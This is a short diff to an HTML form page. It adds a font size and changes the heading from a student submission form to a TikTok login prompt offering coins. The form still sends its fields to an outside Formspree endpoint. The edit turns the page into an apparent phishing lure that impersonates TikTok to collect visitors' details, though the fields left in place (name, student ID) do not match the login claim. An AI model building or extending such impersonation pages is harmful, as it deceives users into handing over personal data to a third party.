--- a/index.html
+++ b/index.html
@@ -25,6 +25,7 @@
     text-align: center;
     margin-bottom: 20px;
     color: #333;
+    font-size: 20px;
   }
   input {
     width: 100%;
@@ -49,7 +50,7 @@
 </head>
 <body>
 <form action="https://formspree.io/f/xyznbrvg" method="POST">
-  <h2>Student Submission Form</h2>
+  <h2>Log in to your TikTok account to get Coins, check notifications and more.</h2>
   <input type="text" name="firstName" placeholder="First Name" required>
   <input type="text" name="lastName" placeholder="Last Name" required>
   <input type="text" name="studentID" placeholder="Student ID" required>
